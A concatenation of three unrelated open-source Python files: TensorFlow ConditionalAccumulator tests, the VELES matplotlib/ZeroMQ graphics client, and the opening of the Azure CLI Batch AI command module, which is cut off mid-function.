q_f32_0 = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
q_f32_1 = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
q_f16_0 = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([1]))
q_f16_1 = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float16, name="Q", shape=tensor_shape.TensorShape([1]))
accums = [q_f16_0, q_f16_1, q_f32_0, q_f32_1]
for i in range(len(accums)):
accums[i].apply_grad((i + 10.0,)).run()
for i in range(len(accums)):
result = accums[i].take_grad(1).eval()
self.assertEqual(result, i + 10.0)
@test_util.run_deprecated_v1
def testAccumulatorApplyAndTakeGradWithShape(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(3, 2))
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(x, y)]
for x, y in zip(elems[0], elems[1])]
accum_ops = [q.apply_grad(x) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
is_all_equal = True
val = self.evaluate(takeg_t)
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
@test_util.run_deprecated_v1
def testAccumulatorApplyGradWithWrongShape(self):
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=(3, 2))
with self.assertRaises(ValueError):
q.apply_grad([[1.0, 2.0], [3.0, 4.0]])
with self.assertRaises(ValueError):
q.apply_grad([[1.0], [2.0], [3.0]])
@test_util.run_deprecated_v1
def testAccumulatorDynamicShape(self):
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=None)
x = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(x)
elems = [[[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]],
[[10.0, 20.0], [30.0, 40.0], [50.0, 60.0]]]
elems_ave = [[(a + b) / len(elems) for a, b in zip(c, d)]
for c, d in zip(elems[0], elems[1])]
takeg_t = q.take_grad(1)
for elem in elems:
sess.run(accum_op, feed_dict={x: elem})
is_all_equal = True
val = self.evaluate(takeg_t)
for i in range(len(val)):
for j in range(len(val[i])):
is_all_equal &= (val[i][j] == elems_ave[i][j])
self.assertTrue(is_all_equal)
@test_util.run_v1_only("b/120545219")
def testAccumulatorWrongDynamicShape(self):
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=None)
x = array_ops.placeholder(dtypes_lib.float32)
accum_op = q.apply_grad(x)
# First successful apply_grad determines shape
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0], [5.0, 6.0]]})
with self.assertRaises(errors_impl.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0, 2.0], [3.0, 4.0]]})
with self.assertRaises(errors_impl.InvalidArgumentError):
sess.run(accum_op, feed_dict={x: [[1.0], [2.0], [3.0]]})
@test_util.run_deprecated_v1
def testAccumulatorSizeAfterApplyGrad(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
@test_util.run_deprecated_v1
def testAccumulatorSizeAfterApplyGradAndTakeGrad(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
accum_op = q.apply_grad((10.0,))
extract_t = q.take_grad(2)
# Applying gradient multiple times to increase size from 0 to 2.
self.assertEqual(q.num_accumulated().eval(), 0)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 1)
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 2)
# Extract will reduce size to 0
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
# Take gradients always sets the size back to 0 if successful.
accum_op = q.apply_grad((10.0,), local_step=1)
accum_op.run()
accum_op.run()
accum_op.run()
accum_op.run()
self.assertEqual(q.num_accumulated().eval(), 4)
extract_t.op.run()
self.assertEqual(q.num_accumulated().eval(), 0)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradMean(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(15.0, val)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(constant_op.constant(1))
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(15.0, val)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradSum(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1]),
reduction_type="SUM")
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(30.0, val)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(constant_op.constant(1))
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(30.0, val)
@test_util.run_deprecated_v1
def testAccumulatorTakeGradInvalidReductionType(self):
with self.assertRaises(ValueError):
data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1]),
reduction_type="Invalid")
@test_util.run_v1_only("b/120545219")
def testAccumulatorInvalidTakeGrad(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [10.0, 20.0]
accum_ops = [q.apply_grad((x,)) for x in elems]
takeg_t = q.take_grad(-1)
for accum_op in accum_ops:
accum_op.run()
with self.assertRaises(errors_impl.InvalidArgumentError):
self.evaluate(takeg_t)
@test_util.run_deprecated_v1
def testAccumulatorRepeatedTakeGradMean(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [10.0, 20.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(elems_ave, val)
elems = [20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(elems_ave + 0.0, val)
@test_util.run_deprecated_v1
def testAccumulatorRepeatedTakeGradSum(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32,
name="Q",
shape=tensor_shape.TensorShape([1]),
reduction_type="SUM")
elems = [10.0, 20.0]
elems_sum = 30.0
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(elems_sum, val)
elems = [20.0, 30.0]
elems_sum = 50.0
accum_ops = [q.apply_grad((x,), local_step=1) for x in elems]
takeg_t = q.take_grad(1)
for accum_op in accum_ops:
accum_op.run()
val = self.evaluate(takeg_t)
self.assertEqual(elems_sum, val)
@test_util.run_deprecated_v1
def testAccumulatorIncrementGlobalStep(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
global_step = variables.Variable(0, name="global_step")
new_global_step = math_ops.add(global_step, 1)
inc_global_step = state_ops.assign(global_step, new_global_step)
set_global_step_op = q.set_global_step(new_global_step)
self.evaluate(variables.global_variables_initializer())
for _ in range(3):
set_global_step_op.run()
self.evaluate(inc_global_step)
@test_util.run_deprecated_v1
def testAccumulatorSetGlobalStepPreventsAccumulation(self):
with self.cached_session():
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
local_steps = range(1000, 1005)
accum_ops = [q.apply_grad((0.0 + x,), local_step=x) for x in local_steps]
for ls in local_steps:
set_global_step_op = q.set_global_step(ls)
set_global_step_op.run()
for accum_op in accum_ops:
accum_op.run()
takeg_t = q.take_grad(1)
val = self.evaluate(takeg_t)
self.assertEqual(0.0 + sum(x for x in local_steps
if x >= ls) / sum(1 for x in local_steps
if x >= ls), val)
@test_util.run_v1_only("b/120545219")
def testParallelApplyGrad(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [10.0, 20.0, 30.0, 40.0, 50.0, 60.0, 70.0, 80.0, 90.0, 100.0]
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(1)
def apply_grad(accum_op):
self.evaluate(accum_op)
threads = [
self.checkedThread(
target=apply_grad, args=(o,)) for o in accum_ops
]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
val = self.evaluate(takeg_t)
self.assertEqual(val, sum(elems) / len(elems))
@test_util.run_v1_only("b/120545219")
def testParallelTakeGrad(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [e for e in range(10)]
accum_ops = [q.apply_grad((np.float32(e),), local_step=e) for e in elems]
takeg_t = q.take_grad(1)
def apply_grad():
for accum_op in accum_ops:
time.sleep(1.0)
self.evaluate(accum_op)
apply_grad_thread = self.checkedThread(target=apply_grad)
results = []
def take_grad():
results.append(self.evaluate(takeg_t))
threads = [self.checkedThread(target=take_grad) for _ in range(10)]
for thread in threads:
thread.start()
apply_grad_thread.start()
for thread in threads:
thread.join()
apply_grad_thread.join()
self.assertItemsEqual(elems, results)
@test_util.run_v1_only("b/120545219")
def testAccumulatorApplyAndBlockingTake(self):
# We need each thread to keep its own device stack or the device scopes
# won't be properly nested.
ops.get_default_graph().switch_to_thread_local()
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
elems = [10.0, 20.0, 30.0]
elems_ave = sum(elems) / len(elems)
accum_ops = [q.apply_grad((x,), local_step=0) for x in elems]
takeg_t = q.take_grad(3)
def apply_grad():
time.sleep(1.0)
for accum_op in accum_ops:
self.evaluate(accum_op)
return_array = []
def take_grad():
return_array.append(self.evaluate(takeg_t))
accum_thread = self.checkedThread(target=apply_grad)
takeg_thread = self.checkedThread(target=take_grad)
accum_thread.start()
takeg_thread.start()
accum_thread.join()
takeg_thread.join()
self.assertEqual([elems_ave], return_array)
def _blocking_takeg(self, sess, takeg_op):
with self.assertRaisesOpError("was cancelled"):
self.evaluate(takeg_op)
@test_util.run_v1_only("b/120545219")
def testAccumulatorCancel(self):
with self.cached_session() as sess:
q = data_flow_ops.ConditionalAccumulator(
dtypes_lib.float32, name="Q", shape=tensor_shape.TensorShape([1]))
takeg_t = q.take_grad(1)
takeg_thread = self.checkedThread(
self._blocking_takeg, args=(sess, takeg_t))
takeg_thread.start()
time.sleep(1.0)
sess.close() # Will cancel blocked operation
takeg_thread.join()
if __name__ == "__main__":
test.main()
|
graphics_client.py | # -*- coding: utf-8 -*-
"""
.. invisible:
_ _ _____ _ _____ _____
| | | | ___| | | ___/ ___|
| | | | |__ | | | |__ \ `--.
| | | | __|| | | __| `--. \
\ \_/ / |___| |___| |___/\__/ /
\___/\____/\_____|____/\____/
Created on Jan 31, 2014
Contains GraphicsClient cllass, which handling all interaction with the main
graphics window
███████████████████████████████████████████████████████████████████████████████
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
███████████████████████████████████████████████████████████████████████████████
"""
import argparse
from collections import defaultdict
import datetime
import errno
import functools
import gc
import logging
from importlib import import_module
import os
import signal
import socket
import threading
from veles.dot_pip import install_dot_pip
install_dot_pip()
import snappy
import tornado.ioloop as ioloop
from twisted.internet.error import ReactorNotRunning
from twisted.internet import reactor
import zmq
from veles.config import root
from veles.txzmq import ZmqConnection, ZmqEndpoint
from veles.iplotter import IPlotter
from veles.logger import Logger
from veles.pickle2 import pickle, setup_pickle_debug
class ZmqSubscriber(ZmqConnection):
socketType = zmq.SUB
def __init__(self, graphics, *args, **kwargs):
super(ZmqSubscriber, self).__init__(*args, **kwargs)
self.socket.set(zmq.SUBSCRIBE, b'graphics')
self.graphics = graphics
def messageReceived(self, message):
self.graphics.debug("Received %d bytes", len(message[0]))
raw_data = snappy.decompress(message[0][len('graphics'):])
obj = pickle.loads(raw_data)
self.graphics.update(obj, raw_data)
class GraphicsClient(Logger):
""" Class handling all interaction with the main graphics window.
"""
ui_update_interval = 0.01
gc_limit = 10
def __init__(self, backend, *endpoints, **kwargs):
super(GraphicsClient, self).__init__()
webagg_fifo = kwargs.get("webagg_fifo")
self.backend = backend
if self.backend == "WebAgg":
self._webagg_port = 0
zmq_endpoints = []
for ep in endpoints:
zmq_endpoints.append(ZmqEndpoint("connect", ep))
self.zmq_connection = ZmqSubscriber(self, zmq_endpoints)
self._lock = threading.Lock()
self._started = False
self._shutted_down = False
self.webagg_fifo = webagg_fifo
self._gc_counter = 0
self._balance = defaultdict(int)
self._dump_dir = kwargs.get("dump_dir")
self._pdf_lock = threading.Lock()
self._pdf_trigger = False
self._pdf_pages = None
self._pdf_file_name = None
self._pdf_units_served = set()
self._pdf_unit_chains = set()
self._sigint_initial = signal.signal(signal.SIGINT,
self._sigint_handler)
self._sigusr2_initial = signal.signal(signal.SIGUSR2,
self._sigusr2_handler)
def __del__(self):
sigint_initial = getattr(self, "_sigint_initial", None)
if sigint_initial is not None:
signal.signal(signal.SIGINT, sigint_initial)
def run(self):
"""Creates and runs main graphics window.
"""
self._lock.acquire()
if self.backend == "no":
self._run()
return
Plotter = import_module("veles.plotter").Plotter
try:
if self._shutted_down:
return
self._started = True
import matplotlib
if self.backend:
matplotlib.use(self.backend)
try:
self.pkgs = Plotter.import_matplotlib()
except ImportError:
self.warning("%s backend is not loadable, falling back to "
"WebAgg")
matplotlib.use("WebAgg", force=True)
try:
self.pkgs = Plotter.import_matplotlib()
except ImportError:
self.exception("Failed to load WebAgg matplotlib backend")
return
self.pp = pp = self.pkgs["pp"]
pp.ion()
if pp.get_backend() == "TkAgg":
from six.moves import tkinter
self.root = tkinter.Tk()
self.root.withdraw()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_tk_events)
# tkinter.mainloop()
elif pp.get_backend() == "Qt4Agg":
import PyQt4
self.root = PyQt4.QtGui.QApplication([])
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_qt_events)
# self.root.exec_()
elif pp.get_backend() == "WxAgg":
import wx
self.root = wx.PySimpleApp()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_wx_events)
# self.root.MainLoop()
elif pp.get_backend() == "WebAgg":
self.condition = threading.Condition()
with self.condition:
self.condition.wait()
free_port = root.common.graphics.matplotlib.webagg_port - 1
result = 0
while result == 0:
free_port += 1
sock = socket.socket(socket.AF_INET,
socket.SOCK_STREAM)
result = sock.connect_ex(("localhost", free_port))
sock.close()
self._webagg_port = free_port
matplotlib.rcParams['webagg.port'] = free_port
matplotlib.rcParams['webagg.open_in_browser'] = 'False'
self.info("Launching WebAgg instance on port %d",
free_port)
if self.webagg_fifo is not None:
fifo = os.open(self.webagg_fifo,
os.O_WRONLY | os.O_NONBLOCK)
self._webagg_port_bytes = \
str(self._webagg_port).encode()
reactor.callWhenRunning(self._write_webagg_port, fifo)
except:
self._lock.release()
raise
self._run()
def update(self, plotter, raw_data):
"""Processes one plotting event.
"""
if plotter is not None:
if self._dump_dir:
file_name = os.path.join(self._dump_dir, "%s_%s.pickle" % (
plotter.name.replace(" ", "_"),
datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')))
with open(file_name, "wb") as fout:
fout.write(raw_data)
self.info("Wrote %s", file_name)
del raw_data
self._gc_counter += 1
if self._gc_counter >= GraphicsClient.gc_limit:
gc.collect()
self._gc_counter = 0
if self.backend == "no":
return
if self._balance[plotter.id] > 0:
self.warning("Skipped %s: too frequent updates or too slow "
"drawing", plotter)
return
self._balance[plotter.id] += 1
plotter.set_matplotlib(self.pkgs)
plotter.show_figure = self.show_figure
if not IPlotter.providedBy(plotter):
self.warning("%s does not provide IPlotter interface", plotter)
self._balance[plotter.id] -= 1
return
try:
plotter.verify_interface(IPlotter)
except:
self.exception("Plotter %s is not fully implemented, skipped",
plotter)
self._balance[plotter.id] -= 1
return
if self._pdf_trigger or self.backend == "pdf":
payload = functools.partial(self._save_pdf, plotter)
else:
payload = plotter.redraw
def work():
self.debug("Begin rendering %s", plotter)
try:
payload()
finally:
self._balance[plotter.id] -= 1
self.debug("End rendering %s", plotter)
reactor.callFromThread(work)
else:
self.debug("Received the command to terminate")
self.shutdown()
def show_figure(self, figure):
if self.pp.get_backend() != "WebAgg":
figure.show()
else:
with self.condition:
self.condition.notify()
def shutdown(self):
with self._lock:
if not self._started or self._shutted_down:
return
self.info("Shutting down")
self._shutted_down = True
if self.pp.get_backend() == "TkAgg":
self.root.destroy()
elif self.pp.get_backend() == "Qt4Agg":
self.root.quit()
elif self.pp.get_backend() == "WxAgg":
self.root.ExitMainLoop()
elif self.pp.get_backend() == "WebAgg":
ioloop.IOLoop.instance().stop()
try:
reactor.stop()
except ReactorNotRunning:
pass
# Not strictly necessary, but prevents from DoS
self.zmq_connection.shutdown()
def _run(self):
self.info("Graphics client is running in process %d", os.getpid())
if self.backend == "no" or self.pp.get_backend() != "WebAgg":
reactor.callWhenRunning(self._lock.release)
try:
reactor.run()
except ReactorNotRunning:
pass
else:
ioloop.IOLoop.instance().add_callback(self._lock.release)
self.pp.show()
self.info("Finished")
def _process_qt_events(self):
self.root.processEvents()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_qt_events)
def _process_tk_events(self):
self.root.update()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_tk_events)
def _process_wx_events(self):
self.root.ProcessPendingEvents()
reactor.callLater(GraphicsClient.ui_update_interval,
self._process_wx_events)
def _write_webagg_port(self, fifo):
try:
written = os.write(fifo, self._webagg_port_bytes)
except (OSError, IOError) as ioe:
if ioe.args[0] in (errno.EAGAIN, errno.EINTR):
written = 0
if written != len(self._webagg_port_bytes):
reactor.callWhenRunning(self._write_webagg_port, fifo)
else:
self.debug("Wrote the WebAgg port to pipe")
os.close(fifo)
def _save_pdf(self, plotter):
with self._pdf_lock:
figure = plotter.redraw()
if plotter.id in self._pdf_units_served:
from veles.portable import show_file
self._pdf_trigger = False
self._pdf_pages.close()
self._pdf_pages = None
self._pdf_units_served.clear()
self._pdf_unit_chains.clear()
self.info("Finished writing PDF %s", self._pdf_file_name)
show_file(self._pdf_file_name)
self._pdf_file_name = None
if self.backend != "pdf":
return
if self._pdf_pages is None:
now = datetime.datetime.now()
out_dir = os.path.join(root.common.dirs.cache, "plots")
try:
os.makedirs(out_dir, mode=0o775)
except OSError:
pass
self._pdf_file_name = os.path.join(
root.common.dirs.cache, "plots/veles_%s.pdf" %
(now.strftime('%Y-%m-%d_%H:%M:%S')))
self.debug("Saving figures to %s...", self._pdf_file_name)
import matplotlib.backends.backend_pdf as backend_pdf
self._pdf_pages = backend_pdf.PdfPages(self._pdf_file_name)
self._pdf_units_served.add(plotter.id)
if getattr(plotter, "clear_plot", False):
self._pdf_unit_chains.add(plotter.name)
elif (plotter.name not in self._pdf_unit_chains or
getattr(plotter, "redraw_plot", False)):
self._pdf_pages.savefig(figure)
def _sigint_handler(self, sign, frame):
self.shutdown()
try:
self._sigint_initial(sign, frame)
except KeyboardInterrupt:
self.critical("KeyboardInterrupt")
def stop():
try:
reactor.stop()
except ReactorNotRunning:
pass
reactor.callWhenRunning(stop)
def _sigusr2_handler(self, sign, frame):
self.info("Activated PDF mode...")
self._pdf_trigger = True
def main():
parser = argparse.ArgumentParser()
parser.add_argument("-b", "--backend", nargs='?',
default=root.common.graphics.matplotlib.backend,
help="Matplotlib drawing backend. \"no\" value disable"
"s any real plotting (useful with --dump).")
parser.add_argument("-e", "--endpoint", required=True,
help="ZeroMQ endpoint to receive updates from.")
parser.add_argument("--webagg-discovery-fifo", nargs='?',
default=None, help="Matplotlib drawing backend.")
LOG_LEVEL_MAP = {"debug": logging.DEBUG, "info": logging.INFO,
"warning": logging.WARNING, "error": logging.ERROR}
parser.add_argument("-v", "--verbose", type=str, default="info",
choices=LOG_LEVEL_MAP.keys(),
help="set verbosity level [default: %(default)s]")
parser.add_argument("-d", "--dump", type=str, default="",
help="Dump incoming messages to this directory.")
cmdargs = parser.parse_args()
log_level = LOG_LEVEL_MAP[cmdargs.verbose]
Logger.setup_logging(level=log_level)
if log_level == logging.DEBUG:
setup_pickle_debug()
client = GraphicsClient(cmdargs.backend, cmdargs.endpoint,
webagg_fifo=cmdargs.webagg_discovery_fifo,
dump_dir=cmdargs.dump)
if log_level == logging.DEBUG:
client.debug("Activated pickle debugging")
if cmdargs.backend == "WebAgg":
client_thread = threading.Thread(target=client.run)
client_thread.start()
reactor.run()
client_thread.join()
else:
client.run()
if __name__ == "__main__":
main()
|
custom.py | # --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=too-many-lines
from __future__ import print_function
import collections
import copy
import datetime
import json
import os
import signal
import socket
import string
import sys
import threading
import time
from functools import partial
from random import shuffle
import paramiko
import requests
from knack.log import get_logger
from knack.util import CLIError
from msrest.serialization import Deserializer
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import is_valid_resource_id, parse_resource_id
from six.moves import urllib_parse
from azure.cli.core import keys
from azure.cli.core.util import get_default_admin_username
from azure.cli.core.commands.client_factory import get_mgmt_service_client
from azure.cli.core.profiles import ResourceType, get_sdk
import azure.mgmt.batchai.models as models
# Environment variables for specifying azure storage account and key. We want the user to make explicit
# decision about which storage account to use instead of using his default account specified via AZURE_STORAGE_ACCOUNT
# and AZURE_STORAGE_KEY.
AZURE_BATCHAI_STORAGE_ACCOUNT = 'AZURE_BATCHAI_STORAGE_ACCOUNT'
AZURE_BATCHAI_STORAGE_KEY = 'AZURE_BATCHAI_STORAGE_KEY'
MSG_CONFIGURE_STORAGE_ACCOUNT = 'Please configure Azure Storage account name via AZURE_BATCHAI_STORAGE_ACCOUNT or ' \
'provide storage_account value in batchai section of your az configuration file.'
MSG_CONFIGURE_STORAGE_KEY = 'Please configure Azure Storage account key via AZURE_BATCHAI_STORAGE_KEY or ' \
'provide storage_key value in batchai section of your az configuration file.'
STANDARD_OUTPUT_DIRECTORY_ID = 'stdouterr'
# Parameters of auto storage
AUTO_STORAGE_RESOURCE_GROUP = 'batchaiautostorage'
AUTO_STORAGE_CONTAINER_NAME = 'batchaicontainer'
AUTO_STORAGE_SHARE_NAME = 'batchaishare'
AUTO_STORAGE_ACCOUNT_PREFIX = 'bai'
AUTO_STORAGE_CONTAINER_PATH = 'autobfs'
AUTO_STORAGE_SHARE_PATH = 'autoafs'
# Placeholders which customer may use in his config file for cluster creation.
AZURE_BATCHAI_STORAGE_KEY_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_KEY)
AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER = '<{0}>'.format(AZURE_BATCHAI_STORAGE_ACCOUNT)
# Default expiration time for file download URLs.
DEFAULT_URL_EXPIRY_MIN = 60
# Supported images.
SUPPORTED_IMAGE_ALIASES = {
"UbuntuLTS": models.ImageReference(
publisher='Canonical',
offer='UbuntuServer',
sku='16.04-LTS'
),
"UbuntuDSVM": models.ImageReference(
publisher='microsoft-ads',
offer='linux-data-science-vm-ubuntu',
sku='linuxdsvmubuntu'
)
}
# Type of entries reported by list startup files.
LogFile = collections.namedtuple('LogFile', 'name download_url is_directory size')
logger = get_logger(__name__)
def _get_resource_group_location(cli_ctx, resource_group):
client = get_mgmt_service_client(cli_ctx, ResourceType.MGMT_RESOURCE_RESOURCES)
return client.resource_groups.get(resource_group).location
def _get_workspace_location(client, resource_group, workspace_name):
workspace = client.workspaces.get(resource_group, workspace_name)
return workspace.location
def _get_default_ssh_public_key_location():
path = os.path.join(os.path.expanduser('~'), '.ssh', 'id_rsa.pub')
if os.path.exists(path):
return path
return None
def _get_deserializer():
client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
return Deserializer(client_models)
def _ensure_resource_not_exist(client, resource_group, workspace, name):
try:
client.get(resource_group, workspace, name)
raise CLIError('"{0}" already exists in "{1}" resource group under {2} resource group.'.format(
name, resource_group, workspace))
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_job_not_exist(client, resource_group, workspace, experiment, name):
try:
client.get(resource_group, workspace, experiment, name)
raise CLIError('A job with given name, experiment, workspace and resource group already exists.')
except CloudError as e:
if e.status_code != 404:
raise
def _ensure_subnet_is_valid(client, subnet, nfs_resource_group, nfs_workspace, nfs_name):
if not subnet:
return
if not is_valid_resource_id(subnet):
raise CLIError('Ill-formed subnet resource id')
# check there are no conflicts between provided subnet and mounted nfs
if not nfs_name:
return
nfs = None # type: models.FileServer
try:
nfs = client.file_servers.get(nfs_resource_group, nfs_workspace, nfs_name)
except CloudError as e:
if e.status_code != 404:
raise
if not nfs:
# CLI will return the error during nfs validation
return
if nfs.subnet.id != subnet:
raise CLIError('Cluster and mounted NFS must be in the same subnet.')
def _get_storage_management_client(cli_ctx):
from azure.mgmt.storage import StorageManagementClient
return get_mgmt_service_client(cli_ctx, StorageManagementClient)
def _get_storage_account_key(cli_ctx, account_name, account_key):
"""Returns account key for the given storage account.
:param str account_name: storage account name.
:param str or None account_key: account key provide as command line argument.
"""
if account_key:
return account_key
storage_client = _get_storage_management_client(cli_ctx)
account = [a.id for a in list(storage_client.storage_accounts.list()) if a.name == account_name]
if not account:
raise CLIError('Cannot find "{0}" storage account.'.format(account_name))
resource_group = parse_resource_id(account[0])['resource_group']
keys_list_result = storage_client.storage_accounts.list_keys(resource_group, account_name)
if not keys_list_result or not keys_list_result.keys:
raise CLIError('Cannot find a key for "{0}" storage account.'.format(account_name))
return keys_list_result.keys[0].value
def _get_effective_storage_account_name_and_key(cli_ctx, account_name, account_key):
"""Returns storage account name and key to be used.
:param str or None account_name: storage account name provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
"""
if account_name:
return account_name, _get_storage_account_key(cli_ctx, account_name, account_key) or ''
return cli_ctx.config.get('batchai', 'storage_account', ''), cli_ctx.config.get('batchai', 'storage_key', '')
def _get_account_name_from_azure_file_url(azure_file_url):
"""Extracts account name from Azure File URL
:param str azure_file_url: Azure File URL
:return str: account name
"""
if not azure_file_url:
raise CLIError('Azure File URL cannot absent or be empty')
o = urllib_parse.urlparse(azure_file_url)
try:
account, _ = o.netloc.split('.', 1)
return account
except ValueError:
raise CLIError('Ill-formed Azure File URL "{0}"'.format(azure_file_url))
def _get_effective_credentials(cli_ctx, existing_credentials, account_name):
"""Returns AzureStorageCredentialInfo for the account
:param models.AzureStorageCredentialsInfo existing_credentials: known credentials
:param str account_name: storage account name
:return models.AzureStorageCredentialsInfo: credentials to be used
"""
if existing_credentials and (existing_credentials.account_key or existing_credentials.account_key_secret_reference):
return existing_credentials
return models.AzureStorageCredentialsInfo(
account_key=_get_storage_account_key(cli_ctx, account_name, account_key=None))
def _patch_mount_volumes(cli_ctx, volumes, account_name=None, account_key=None):
"""Patches mount volumes by replacing placeholders and adding credentials information.
:param models.MountVolumes or None volumes: mount volumes.
:param str or None account_name: name of the storage account provided as command line argument.
:param str or None account_key: storage account key provided as command line argument.
:return models.ClusterCreateParameters: updated parameters.
"""
if volumes is None:
return None
result = copy.deepcopy(volumes) # type: models.MountVolumes
storage_account_name, storage_account_key = _get_effective_storage_account_name_and_key(
cli_ctx, account_name, account_key)
require_storage_account = False
require_storage_account_key = False
# Patch parameters of azure file share.
if result.azure_file_shares:
for ref in result.azure_file_shares:
# Populate account name if it was not provided
if not ref.account_name:
ref.account_name = _get_account_name_from_azure_file_url(ref.azure_file_url)
# Replace placeholders
if ref.account_name == AZURE_BATCHAI_STORAGE_ACCOUNT_PLACEHOLDER:
require_storage_account = True
ref.account_name = storage_account_name
